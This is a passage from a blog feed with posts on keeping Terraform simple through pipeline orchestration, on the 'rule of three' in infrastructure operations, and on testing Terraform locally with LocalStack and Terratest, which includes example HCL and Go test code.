<p>Compare this to opening a directory, seeing exactly what gets deployed to staging, making the change, and submitting a PR. The difference in time-to-productivity is measured in weeks.</p>

<h3 id="ecosystem-lock-in-the-hidden-technical-debt">Ecosystem Lock-in: The Hidden Technical Debt</h3>

<p>Once you’ve invested in a DRY abstraction framework, you’re locked in. Your entire codebase assumes its patterns. Your team has learned its idioms. Your CI/CD pipelines depend on it. Your documentation references it.</p>

<p>Migrating away becomes a massive project that no one wants to fund. Meanwhile, the tool’s limitations become your limitations. When Terraform adds new features, you wait for your abstraction layer to support them—if it ever does.</p>

<p>You’ve traded lines of code for organizational flexibility.</p>

<h2 id="the-kiss-alternative-orchestration-in-pipelines-simplicity-in-code">The KISS Alternative: Orchestration in Pipelines, Simplicity in Code</h2>

<p>After years of working with various Terraform patterns, from sophisticated DRY frameworks to custom abstraction layers, I found a pattern that just works: <strong>pure Terraform with GitHub Actions orchestration</strong>.</p>

<p>This isn’t about rejecting tools like Terragrunt or Terraspace entirely. They have their place at specific scales and contexts. But for the majority of teams managing infrastructure at moderate scale, there’s a simpler path that works better.</p>

<h3 id="the-core-insight-complexity-can-only-be-relocated">The Core Insight: Complexity Can Only Be Relocated</h3>

<p>Orchestration complexity across environments cannot be eliminated. You can’t wish away the fact that dev, staging, and production need different configurations, or that multi-region deployments require coordination.</p>

<p>The question isn’t “how do we eliminate complexity?” It’s “where do we put the complexity to minimize time to business value?”</p>

<p><strong>DRY approach</strong>: Complexity lives in abstraction tooling and configuration hierarchies
<strong>KISS approach</strong>: Complexity lives in CI/CD pipelines, where it’s observable and debuggable</p>

<h3 id="the-repo-structure-nested-and-navigable">The Repo Structure: Nested and Navigable</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>├── aws/
│   ├── us-east-1/
│   │   ├── dev/
│   │   │   ├── vpc/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── eks/
│   │   │   │   ├── main.tf
│   │   │   │   ├── variables.tf
│   │   │   │   ├── backend.tf
│   │   │   │   └── terraform.tfvars
│   │   │   ├── mwaa/
│   │   │   │   └── [terraform files]
│   │   │   ├── opensearch/
│   │   │   │   └── [terraform files]
│   │   │   └── rds/
│   │   │       └── [terraform files]
│   │   ├── staging/
│   │   │   ├── vpc/
│   │   │   ├── eks/
│   │   │   ├── mwaa/
│   │   │   └── [other services]
│   │   └── prod/
│   │       ├── vpc/
│   │       ├── eks/
│   │       ├── mwaa/
│   │       └── [other services]
│   └── us-west-2/
│       └── [similar structure]
├── azure/
│   └── [similar structure]
├── gcp/
│   └── [similar structure]
└── modules/
    ├── networking/
    ├── compute/
    ├── kubernetes/
    └── databases/
</code></pre></div></div>

<p><strong>Key characteristics:</strong></p>
<ul>
  <li>Can break down by service (eks, mwaa, opensearch) or by logical grouping depending on your needs</li>
  <li>Each service has its own state file, isolated blast radius</li>
  <li>Reusable modules in central directory</li>
  <li>No terraliths, no monolithic state files</li>
  <li>Completely navigable, you can grep for anything</li>
</ul>

<p>Each service directory is a complete Terraform root module. Open <code class="language-plaintext highlighter-rouge">aws/us-east-1/prod/eks/</code> and you see exactly what’s deployed for your production EKS cluster in us-east-1. No inheritance chains. No dynamic generation. No magic. Just the actual configuration that gets applied.</p>

<h3 id="yes-backend-configs-repeat-and-thats-actually-a-feature">Yes, Backend Configs Repeat (And That’s Actually a Feature)</h3>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># aws/core-infrastructure/prod/backend.tf</span>
<span class="nx">terraform</span> <span class="p">{</span>
  <span class="nx">backend</span> <span class="s2">"s3"</span> <span class="p">{</span>
    <span class="nx">bucket</span>         <span class="o">=</span> <span class="s2">"myorg-terraform-state-prod"</span>
    <span class="nx">key</span>            <span class="o">=</span> <span class="s2">"core-infrastructure/terraform.tfstate"</span>
    <span class="nx">region</span>         <span class="o">=</span> <span class="s2">"us-east-1"</span>
    <span class="nx">encrypt</span>        <span class="o">=</span> <span class="kc">true</span>
    <span class="nx">dynamodb_table</span> <span class="o">=</span> <span class="s2">"terraform-state-lock-prod"</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This config appears in every environment directory with slight variations. DRY purists hate this, but I love it.</p>

<p>When something goes wrong with state, I can immediately see which bucket holds this state, which DynamoDB table provides locking, and I don’t need to trace through dynamic generation logic. Running <code class="language-plaintext highlighter-rouge">grep "myorg-terraform-state-prod"</code> shows me every environment using that bucket instantly.</p>

<p>The cost of repetition is about 100 lines of simple YAML across 20 environments. The benefit is instant troubleshooting, zero cognitive overhead, and perfect clarity about where everything lives.</p>

<h3 id="orchestration-lives-in-pipelines">Orchestration Lives in Pipelines</h3>

<p>This is where the magic happens, and where the orchestration complexity actually belongs.</p>

<p>Home-grown GitHub Actions provide:</p>

<p><strong>For Pull Requests:</strong></p>
<ul>
  <li>Auto-detect which environments changed based on file paths</li>
  <li>Run <code class="language-plaintext highlighter-rouge">terraform plan</code> for affected environments</li>
  <li>Post plan output as PR comment</li>
  <li>Run security/compliance checks</li>
  <li>Block merge on plan failures</li>
</ul>

<p><strong>For Main Branch:</strong></p>
<ul>
  <li>Auto-detect environments to apply</li>
  <li>Run <code class="language-plaintext highlighter-rouge">terraform apply</code> with approval gates</li>
  <li>Alert on failed applies</li>
  <li>Remediate orphaned resources</li>
  <li>Track drift and create tickets</li>
</ul>

<p><strong>Scheduled:</strong></p>
<ul>
  <li>Nightly drift detection across all environments</li>
  <li>Compare live state to code</li>
  <li>Alert on unexpected changes</li>
</ul>

<p>The result is minimal troubleshooting, teams freed to focus on business value, and infrastructure that’s invisible (which is exactly as it should be).</p>

<h2 id="addressing-the-objections">Addressing the Objections</h2>

<h3 id="but-youre-repeating-backend-configurations">“But You’re Repeating Backend Configurations!”</h3>

<p>Yes. Intentionally.</p>

<p>100 lines of repeated backend config across environments vs. 40 hours learning Terragrunt’s nuances. Which has a better ROI?</p>

<p>Repetition creates greppability. When investigating state issues, <code class="language-plaintext highlighter-rouge">grep "bucket-name"</code> immediately shows every environment. No tracing through dynamic generation. No “where did this value come from?”</p>

<p>In infrastructure code, transparency trumps terseness every time.</p>

<h3 id="you-dont-have-hierarchical-inheritance">“You Don’t Have Hierarchical Inheritance!”</h3>

<p>Correct, and that’s also intentional.</p>

<p>Hierarchical inheritance creates implicit dependencies. Values cascade from global to regional to environment-specific configs. When something breaks, you’re debugging the inheritance chain instead of the infrastructure.</p>

<p>Without inheritance, every value is explicit in the environment directory. New team members don’t need to learn your inheritance model, they just read the config.</p>

<p>The onboarding time saved pays for repeated config 100 times over.</p>

<h3 id="this-wont-scale">“This Won’t Scale!”</h3>

<p>It depends on what you mean by “scale.”</p>

<p>200 environments across multiple accounts and regions? This pattern handles it cleanly. Each environment is independent, changes are isolated, and blast radius is contained.</p>

<p>The pattern breaks down at truly massive scale, like 1000+ environments with complex interdependencies. At that point, you need more sophisticated tooling. But be honest: do you actually have that problem, or are you solving for imagined future scale?</p>

<p>Most teams adopt DRY tooling as “best practice” before hitting the scale where it provides value. They pay the complexity cost without reaping the benefits.</p>

<h2 id="when-to-use-what-the-nuanced-reality">When to Use What: The Nuanced Reality</h2>

<h3 id="kiss-makes-sense-when">KISS Makes Sense When:</h3>
<ul>
  <li>You have fewer than 500 environments</li>
  <li>Team size is small to medium (&lt; 50 engineers)</li>
  <li>Change frequency is low (infrastructure mostly stable after initial deployment)</li>
  <li>Operational clarity is critical (regulated industries, high-stakes infrastructure)</li>
  <li>Team has varied experience levels (sysadmins, not primarily developers)</li>
  <li>Troubleshooting speed matters more than code elegance</li>
</ul>

<h3 id="dry-tooling-makes-sense-when">DRY Tooling Makes Sense When:</h3>
<ul>
  <li>You genuinely have massive scale (1000+ environments with interdependencies)</li>
  <li>Your team is primarily platform engineers comfortable with abstraction</li>
  <li>You have dedicated platform team maintaining the tooling</li>
  <li>Environment configurations have complex shared logic that changes frequently</li>
  <li>You’re building infrastructure-as-a-product with many consumers</li>
  <li>Compliance requires enforced patterns across all deployments</li>
</ul>

<h3 id="the-real-question-whats-your-actual-cost-metric">The Real Question: What’s Your Actual Cost Metric?</h3>

<p><strong>If your cost metric is lines of code written</strong>, choose DRY.
<strong>If your cost metric is time to accomplish business goals</strong>, choose KISS.</p>

<p>Everything that increases time to business value (technical debt from abstraction, lengthy onboarding, opaque troubleshooting) is expensive regardless of how “clean” the code looks.</p>

<h2 id="the-anti-pattern-engineering-for-engineerings-sake">The Anti-Pattern: Engineering for Engineering’s Sake</h2>

<p>The most dangerous trap in infrastructure work is falling in love with the tool or solution rather than the problem.</p>

<p>When teams spend months building sophisticated hierarchies with dynamic generation and complex inheritance models, they’re often solving for code aesthetics, not business needs. The infrastructure becomes the focus instead of what it enables.</p>

<p>Good infrastructure engineering is invisible. It lets other teams ship quickly without thinking about the underlying platforms. It doesn’t require specialized knowledge to make basic changes. It doesn’t become a bottleneck or a point of pride, it’s just there, working, quietly enabling the business.</p>

<p>This requires humility. The “clever” solution that demonstrates engineering prowess is often the wrong solution for the business. The “boring” solution that anyone can understand and modify is often right.</p>

<h2 id="the-minimum-viable-architecture-principle">The Minimum Viable Architecture Principle</h2>

<p>Start with what you need now. Build it simply. Make it modular so pieces can be replaced. Iterate and improve over time as actual needs emerge.</p>

<p>Don’t build for imagined future scale that may never materialize. Don’t adopt sophisticated tooling because it’s “best practice” if you don’t have the problems it solves. Don’t engineer abstractions that save lines of code but cost weeks of onboarding time.</p>

<p><strong>Infrastructure is an auxiliary operation.</strong> Its job is to get out of the way and let the business move fast. Every layer of abstraction, every sophisticated pattern, every clever optimization should be justified by actual business impact—not engineering aesthetics.</p>

<h2 id="conclusion-choose-boring-technology">Conclusion: Choose Boring Technology</h2>

<p>After years of working with Infrastructure as Code at various scales, here’s what I’ve learned:</p>

<p>Orchestration complexity can’t be eliminated, it can only be relocated. The question is where to put it. For most teams, putting that complexity in observable, debuggable CI/CD pipelines beats putting it in abstraction frameworks and configuration hierarchies.</p>

<p>Terraform itself is powerful enough for most use cases. Most teams don’t need additional abstraction layers. Pure Terraform with thoughtful repo structure and pipeline orchestration handles moderate scale beautifully while keeping troubleshooting straightforward and onboarding fast.</p>

<p>There’s a place for sophisticated DRY tooling at massive scale with dedicated platform teams. But most teams aren’t there yet. They’re paying complexity costs for benefits they haven’t yet earned.</p>

<p>Choose boring technology. Keep it simple. Focus on business velocity over code elegance. Your 3 AM self will thank you.</p>

<hr />

<p>If you liked (or hated) this blog, feel free to check out my <a href="https://github.com/R0seSecurity">GitHub</a>!</p>]]></content><author><name></name></author><category term="terraform" /><category term="culture" /><category term="technicaldebt" /><category term="quality" /><category term="code" /><summary type="html"><![CDATA[The Scale Gap Problem]]></summary></entry><entry><title type="html">Gang of Three: Pragmatic Operations Design Patterns</title><link href="https://rosesecurity.cloud/2025/10/23/gang-of-three.html" rel="alternate" type="text/html" title="Gang of Three: Pragmatic Operations Design Patterns" /><published>2025-10-23T00:00:00+00:00</published><updated>2025-10-23T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2025/10/23/gang-of-three</id><content type="html" xml:base="https://rosesecurity.cloud/2025/10/23/gang-of-three.html"><![CDATA[<p>This blog is dedicated to <a href="https://github.com/arcaven">arcaven</a>, who initially made me aware of this observation and opened my eyes to the wild world of infrastructure and system operations patterns at scale.</p>

<h2 id="i-cant-unsee-it">I Can’t Unsee It</h2>

<p>A few weeks ago, something clicked. Maybe the shorter, winter-approaching days slowed me down enough to notice, but suddenly threes were everywhere. Why do we split environments into development, staging, and production? Why do we stage upgrades across three clusters? Why do we run hot, warm, and cold storage tiers? Why does our CI/CD pipeline have build and test, staging deployment, and production deployment gates?</p>

<p>The number three keeps showing up in systems work, and surprisingly few people talk about it explicitly. As it turns out, this pattern is not coincidence. It represents the intersection of distributed systems theory and practical operations experience. Once you start looking for it, you’ll find the rule of three embedded in nearly every mature infrastructure decision.</p>

<h2 id="where-consensus-algorithms-meet-change-management">Where Consensus Algorithms Meet Change Management</h2>

<p>Distributed systems run on quorum-based decision making. What that means is that a majority of nodes have to agree before committing state changes (see Paxos and Raft). These consensus algorithms are designed to handle node failures, communication delays, and network partitions while ensuring the system can continue making progress even when failures occur. With three nodes, you can lose one and still have two nodes available to form a majority. This gives you fault tolerance and forward progress in the same architectural package.</p>

<p>Two nodes cannot lose anything without risking deadlock or split-brain scenarios. Four or five nodes provide more headroom for failures, but three is the minimum viable number that actually delivers reliable consensus. It is also practical from a cost and complexity perspective. This is why you see three-node clusters everywhere across the industry. This is not cargo culting or blind imitation, this is mathematics driving architecture.</p>

<p>The same logic drives traditional thinking around redundancy planning. Three instances means one for baseline capacity, one available during maintenance windows, and one ready for the surprise failure at 3am. Load balancers, database replicas, and availability zones all follow this pattern because it maps cleanly to how systems actually fail in production environments.</p>

<p>This pattern also extends to monitoring and alerting systems. Three data points allow you to establish a trend and distinguish between noise and signal. A single metric spike might be nothing, two consecutive spikes suggest investigation, but three consecutive anomalies typically trigger automated responses or pages. The threshold of three provides enough confidence to act without creating alert fatigue from false positives.</p>

<h2 id="aws-best-practices-and-chaos-engineering">AWS Best Practices and Chaos Engineering</h2>

<p>AWS regions typically ship with three or more availability zones, and the Well-Architected Framework encourages spreading workloads across them. This is not just resilience theater or checkbox compliance. It embodies that same quorum mathematics we discussed earlier. Lose one availability zone and your system continues running with consensus intact. Your application remains available, your data stays consistent, and your customers notice nothing.</p>

<p>Chaos engineering practices naturally gravitate toward threes as well. Kill one instance and observe what happens. You are testing real failure modes while keeping two healthy nodes as a safety net. This allows destructive testing that does not actually destroy your service. You gain confidence in your resilience mechanisms without risking a full outage. Tools like Chaos Monkey and Gremlin are built around this philosophy of controlled, incremental failure injection.</p>

<p>Rolling deployments across three clusters provide a built-in verification pattern that works remarkably well in practice. Deploy to the first cluster, verify correct behavior, then proceed to the second. Verify again, then move to the third. These two checkpoints before full rollout give you opportunities to catch unusual issues before they propagate everywhere. Your first cluster serves as your canary, detecting problems early. Your second cluster provides a confidence check that the issue was not environment-specific. Your third cluster represents your validated rollout to the remainder of your infrastructure.</p>

<h2 id="storage-hierarchies-and-performance-tiers">Storage Hierarchies and Performance Tiers</h2>

<p>Storage systems provide another compelling example of the rule of three in action. Hot storage serves frequently accessed data with low latency. Warm storage holds less frequently accessed data at moderate cost and performance. Cold storage archives rarely accessed data at minimal cost. This three-tier architecture balances performance requirements against budget constraints while providing clear migration paths as data ages.</p>

<p>Cloud providers have built entire product lines around this model. Amazon S3 offers Standard, Infrequent Access, and Glacier tiers. Azure provides Hot, Cool, and Archive tiers. Google Cloud offers Standard, Nearline, and Coldline storage classes. The consistency across providers suggests this is not arbitrary product segmentation but rather a natural reflection of how organizations actually use data over time.</p>

<p>Database systems follow similar patterns. Many databases implement a three-level caching strategy with L1 cache in memory, L2 cache on fast local storage, and L3 representing the authoritative data on persistent storage. Each level trades off speed for capacity and durability. This hierarchy allows databases to serve most queries from fast cache while maintaining data integrity through persistent storage.</p>

<h2 id="the-practical-value-of-three">The Practical Value of Three</h2>

<p>Understanding why three works so well helps us make better infrastructure decisions. When designing a new system, starting with three of anything gives you a resilient foundation without over-engineering. Three availability zones, three environment tiers, three deployment stages, three monitoring thresholds. Each application of the pattern provides fault tolerance, verification opportunities, and practical operability.</p>

<p>This does not mean three is always the right answer. Some systems genuinely need more redundancy or more granular staging. However, three serves as an excellent default that you should consciously decide to deviate from rather than accidentally under-provision. If you find yourself choosing two of something, ask whether you are accepting unnecessary fragility. If you are choosing five, ask whether the additional complexity provides proportional value. Thanks for reading, and if you like this blog, you might like the code and tools in <a href="https://github.com/R0seSecurity">my Github</a>.</p>]]></content><author><name></name></author><category term="operations" /><category term="infrastructure" /><category term="administration" /><summary type="html"><![CDATA[This blog is dedicated to arcaven, who initially made me aware of this observation and opened my eyes to the wild world of infrastructure and system operations patterns at scale.]]></summary></entry><entry><title type="html">Testing IaC with the TerraStack</title><link href="https://rosesecurity.cloud/2025/08/15/testing-iac-with-the-terrastack.html" rel="alternate" type="text/html" title="Testing IaC with the TerraStack" /><published>2025-08-15T00:00:00+00:00</published><updated>2025-08-15T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2025/08/15/testing-iac-with-the-terrastack</id><content type="html" xml:base="https://rosesecurity.cloud/2025/08/15/testing-iac-with-the-terrastack.html"><![CDATA[<h2 id="context">Context</h2>

<p>You write a Terraform module, parameterize the inputs, add some advanced settings, and push your PR. You’re 76% confident it works as intended. Most configuration looks solid, but a few settings could go either way when your <code class="language-plaintext highlighter-rouge">apply</code> pipeline runs. You’ve heard about test-driven development, seen <code class="language-plaintext highlighter-rouge">test</code> directories in popular open source Terraform modules with some obscure Go code, but you’re not sure how it all fits together. On top of that, you don’t have a dedicated test account for deploying test resources, and spinning up real AWS infrastructure just to test some simple configurations feels like overkill.</p>

<p>I’ve seen this scenario <em>a lot</em>, so I took a crack at a solution. Testing Infrastructure as Code has always been a bit of a pain point with limited options. Lots of cross your fingers and hope, manual testing in dev accounts, unit testing with mocks that miss actual cloud provider interactions, or expensive integration testing with real resources (that become orphaned and require <code class="language-plaintext highlighter-rouge">aws-nuke</code>… different story for another blog). What we really need is something that gives us confidence without the overhead, cost, or complexity of managing separate test infrastructure.</p>

<h2 id="building-the-terrastack">Building the TerraStack</h2>

<p>I built yet another Go package to eliminate some pains of testing Infrastructure as Code (IaC). When you don’t have a dedicated test account, can’t predict how your configurations will hold up when they actually hit the API, and want to have a consolidated way to test locally and in CI/CD pipelines, this helper library can help. The <a href="https://github.com/R0seSecurity/go-localstack">go-localstack</a> package combines the power of LocalStack (a fully functional local AWS cloud stack) with Terratest’s battle-tested testing framework. I jokingly call this duo the TerraStack (please don’t sue me, company that <em>builds geospatial products that enable smarter land asset management and development</em>).</p>

<p>Any way, LocalStack spins up a containerized environment that mimics AWS services locally. No real resources, no surprise bills, no cleanup headaches. Your Terraform code thinks it’s talking to real AWS, but it’s actually hitting LocalStack’s mock services running in Docker. This approach solves several pain points at once like fast feedback loops with tests running in seconds rather than minutes, CI/CD friendly integration since everything runs in containers, real API interactions unlike unit tests with mocks, and automatic cleanup when the container dies.</p>

<h2 id="setting-up-your-test-environment">Setting Up Your Test Environment</h2>

<p>Let’s walk through a basic example that tests an S3 bucket configuration. You’ll need a basic Terraform configuration and a Go test file to get started. Here’s a simple configuration that creates an S3 bucket with some tags:</p>

<p><strong>test.tf:</strong></p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># An example Terraform configuration (stolen from provider docs) for provisioning an S3 bucket with Localstack</span>
<span class="nx">resource</span> <span class="s2">"aws_s3_bucket"</span> <span class="s2">"example"</span> <span class="p">{</span>
  <span class="nx">bucket</span> <span class="o">=</span> <span class="s2">"my-tf-test-bucket"</span>

  <span class="nx">tags</span> <span class="o">=</span> <span class="p">{</span>
    <span class="nx">Name</span>        <span class="o">=</span> <span class="s2">"My bucket"</span>
    <span class="nx">Environment</span> <span class="o">=</span> <span class="s2">"Dev"</span>
  <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>For the provider configuration, you have two options. The first approach requires configuring the AWS provider to point directly to LocalStack endpoints. Notice how we’re pointing the AWS provider endpoints to LocalStack instead of real AWS, using dummy credentials since LocalStack doesn’t authenticate, and setting default tags to help identify resources created during testing:</p>

<p><strong>providers.tf:</strong></p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">provider</span> <span class="s2">"aws"</span> <span class="p">{</span>
  <span class="nx">region</span>                      <span class="o">=</span> <span class="s2">"us-east-1"</span>
  <span class="nx">access_key</span>                  <span class="o">=</span> <span class="s2">"test"</span>
  <span class="nx">secret_key</span>                  <span class="o">=</span> <span class="s2">"test"</span>
  <span class="nx">s3_use_path_style</span>           <span class="o">=</span> <span class="kc">false</span>
  <span class="nx">skip_credentials_validation</span> <span class="o">=</span> <span class="kc">true</span>
  <span class="nx">skip_metadata_api_check</span>     <span class="o">=</span> <span class="kc">true</span>
  <span class="nx">skip_requesting_account_id</span>  <span class="o">=</span> <span class="kc">true</span>


  <span class="nx">endpoints</span> <span class="p">{</span>
    <span class="nx">s3</span>                       <span class="o">=</span> <span class="s2">"http://s3.localhost.localstack.cloud:4566"</span>
    <span class="nx">sts</span>                      <span class="o">=</span> <span class="s2">"http://localhost:4566"</span>
  <span class="p">}</span>

  <span class="nx">default_tags</span> <span class="p">{</span>
    <span class="nx">tags</span> <span class="o">=</span> <span class="p">{</span>
      <span class="nx">Environment</span> <span class="o">=</span> <span class="s2">"Local"</span>
      <span class="nx">Service</span>     <span class="o">=</span> <span class="s2">"LocalStack"</span>
    <span class="p">}</span>
  <span class="p">}</span>
<span class="err">}</span>
</code></pre></div></div>

<p>Alternatively, you can skip the provider configuration entirely by using the <code class="language-plaintext highlighter-rouge">tflocal</code> binary instead of <code class="language-plaintext highlighter-rouge">terraform</code>. This is LocalStack’s wrapper around Terraform that automatically configures all the necessary provider settings. To use this approach, you’ll need to install the LocalStack CLI in your test environment with <code class="language-plaintext highlighter-rouge">pip install localstack</code>, then set the <code class="language-plaintext highlighter-rouge">TerraformBinary</code> option in your Terratest configuration to <code class="language-plaintext highlighter-rouge">tflocal</code>. This simplifies your setup significantly since you don’t need to manage provider endpoint configurations, but it does add a Python dependency to your test environment.</p>

<h2 id="writing-comprehensive-tests">Writing Comprehensive Tests</h2>

<p>The Go test is where <code class="language-plaintext highlighter-rouge">go-localstack</code> shines by abstracting away the container management complexity. Here’s a basic test that demonstrates the core functionality:</p>

<p><strong>s3_bucket_test.go:</strong></p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">package</span> <span class="n">main</span>

<span class="k">import</span> <span class="p">(</span>
	<span class="s">"context"</span>
	<span class="s">"testing"</span>

	<span class="s">"github.com/R0seSecurity/go-localstack/localstack"</span>
	<span class="s">"github.com/docker/docker/client"</span>
	<span class="s">"github.com/gruntwork-io/terratest/modules/terraform"</span>
	<span class="s">"github.com/stretchr/testify/assert"</span>
<span class="p">)</span>

<span class="k">func</span> <span class="n">TestS3BucketWithLocalStack</span><span class="p">(</span><span class="n">t</span> <span class="o">*</span><span class="n">testing</span><span class="o">.</span><span class="n">T</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">t</span><span class="o">.</span><span class="n">Parallel</span><span class="p">()</span>

	<span class="n">ctx</span> <span class="o">:=</span> <span class="n">context</span><span class="o">.</span><span class="n">Background</span><span class="p">()</span>

	<span class="c">// Create a Docker client</span>
	<span class="n">cli</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">client</span><span class="o">.</span><span class="n">NewClientWithOpts</span><span class="p">(</span><span class="n">client</span><span class="o">.</span><span class="n">FromEnv</span><span class="p">,</span> <span class="n">client</span><span class="o">.</span><span class="n">WithAPIVersionNegotiation</span><span class="p">())</span>
	<span class="n">assert</span><span class="o">.</span><span class="n">NoError</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span>
	<span class="k">defer</span> <span class="k">func</span><span class="p">()</span> <span class="p">{</span> <span class="n">_</span> <span class="o">=</span> <span class="n">cli</span><span class="o">.</span><span class="n">Close</span><span class="p">()</span> <span class="p">}()</span>

	<span class="c">// Start LocalStack container</span>
	<span class="n">runner</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">localstack</span><span class="o">.</span><span class="n">NewRunner</span><span class="p">(</span><span class="n">cli</span><span class="p">)</span>
	<span class="n">assert</span><span class="o">.</span><span class="n">NoError</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span>

	<span class="n">containerID</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">runner</span><span class="o">.</span><span class="n">Start</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span>
	<span class="n">assert</span><span class="o">.</span><span class="n">NoError</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">err</span><span class="p">)</span>
	<span class="n">assert</span><span class="o">.</span><span class="n">NotEmpty</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">containerID</span><span class="p">)</span>

	<span class="c">// Run Terratest with Terraform options</span>
	<span class="n">tfOptions</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">terraform</span><span class="o">.</span><span class="n">Options</span><span class="p">{</span>
		<span class="n">TerraformDir</span><span class="o">:</span> <span class="s">"."</span><span class="p">,</span>
		<span class="n">Upgrade</span><span class="o">:</span>      <span class="no">true</span><span class="p">,</span>
	<span class="p">}</span>

	<span class="k">defer</span> <span class="n">terraform</span><span class="o">.</span><span class="n">Destroy</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">tfOptions</span><span class="p">)</span>
	<span class="n">terraform</span><span class="o">.</span><span class="n">InitAndApply</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">tfOptions</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This basic test spins up a LocalStack container using Docker, configures Terratest to run Terraform commands against our configuration, runs <code class="language-plaintext highlighter-rouge">terraform init</code> and <code class="language-plaintext highlighter-rouge">terraform apply</code>, and automatically runs <code class="language-plaintext highlighter-rouge">terraform destroy</code> when the test completes thanks to the defer statement. The entire test cycle from container startup to resource creation and cleanup takes just under 11 seconds, which is pretty impressive for a full integration test.</p>

<h2 id="advanced-testing-scenarios">Advanced Testing Scenarios</h2>

<p>You can extend this approach significantly beyond basic resource creation. For more comprehensive validation, you can use Terratest’s built-in assertion functions and the AWS SDK to verify that resources were created with the correct properties. Here’s how you might validate that your S3 bucket name was created and outputted successfully:</p>

<p>You can add an additional output to your Terraform configuration:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">output</span> <span class="s2">"bucket_name"</span> <span class="p">{</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"The name of the S3 bucket"</span>
  <span class="nx">value</span>       <span class="o">=</span> <span class="nx">aws_s3_bucket</span><span class="p">.</span><span class="nx">example</span><span class="p">.</span><span class="nx">bucket</span>
<span class="p">}</span>
</code></pre></div></div>

<p>And update your test logic to ensure the output logic works:</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// After terraform apply, validate the bucket was created correctly</span>
<span class="n">bucketName</span> <span class="o">:=</span> <span class="n">terraform</span><span class="o">.</span><span class="n">Output</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">tfOptions</span><span class="p">,</span> <span class="s">"bucket_name"</span><span class="p">)</span>
<span class="n">assert</span><span class="o">.</span><span class="n">Equal</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="s">"my-tf-test-bucket"</span><span class="p">,</span> <span class="n">bucketName</span><span class="p">)</span>
</code></pre></div></div>

<h2 id="using-test-fixtures-and-variables">Using Test Fixtures and Variables</h2>

<p>For testing modules with different configurations, you can leverage Terratest’s support for variable files and fixtures. Create a <code class="language-plaintext highlighter-rouge">fixtures</code> directory with different <code class="language-plaintext highlighter-rouge">.tfvars</code> files for various test scenarios:</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">tfOptions</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">terraform</span><span class="o">.</span><span class="n">Options</span><span class="p">{</span>
    <span class="n">TerraformDir</span><span class="o">:</span> <span class="s">"./fixtures/basic-bucket"</span><span class="p">,</span>
    <span class="n">VarFiles</span><span class="o">:</span>     <span class="p">[]</span><span class="kt">string</span><span class="p">{</span><span class="s">"test.tfvars"</span><span class="p">},</span>
    <span class="n">Vars</span><span class="o">:</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="k">interface</span><span class="p">{}{</span>
        <span class="s">"bucket_name"</span><span class="o">:</span> <span class="n">fmt</span><span class="o">.</span><span class="n">Sprintf</span><span class="p">(</span><span class="s">"test-bucket-%s"</span><span class="p">,</span> <span class="n">uuid</span><span class="o">.</span><span class="n">New</span><span class="p">()</span><span class="o">.</span><span class="n">String</span><span class="p">()),</span>
        <span class="s">"environment"</span><span class="o">:</span> <span class="s">"test"</span><span class="p">,</span>
    <span class="p">},</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This approach allows you to test the same module with different input combinations, ensuring your module handles edge cases correctly. You can create separate test functions for different scenarios - basic functionality, advanced configurations, error conditions, and variable validation. For example, you might have <code class="language-plaintext highlighter-rouge">TestBasicS3Bucket</code>, <code class="language-plaintext highlighter-rouge">TestS3BucketWithEncryption</code>, <code class="language-plaintext highlighter-rouge">TestS3BucketWithInvalidName</code> to cover various use cases.</p>

<h2 id="testing-multi-resource-stacks">Testing Multi-Resource Stacks</h2>

<p>The real power of this approach becomes evident when testing entire stacks of interconnected resources. You can test complete environments with VPCs, subnets, security groups, and EC2 instances all running against LocalStack. The container automatically handles service discovery and networking between different AWS services, so your Lambda functions can actually invoke other services, your EC2 instances can write to S3 buckets, and your API Gateway can trigger the right backend services.</p>

<p>Error condition testing is equally valuable - intentionally break configurations to ensure your modules fail gracefully and provide helpful error messages. This helps catch issues before they hit production and ensures your error handling is robust.</p>

<h2 id="running-your-tests">Running Your Tests</h2>

<p>With everything in place, you can run your tests with: <code class="language-plaintext highlighter-rouge">go test -v ./...</code>. The output shows what’s happening during the test execution, including container startup, Terraform planning and applying, resource creation, and cleanup. The combination of LocalStack’s AWS emulation and Terratest’s testing framework gives you confidence that your infrastructure code works without the operational overhead of managing test accounts or worrying about resource cleanup.</p>

<p><strong>Test output:</strong></p>

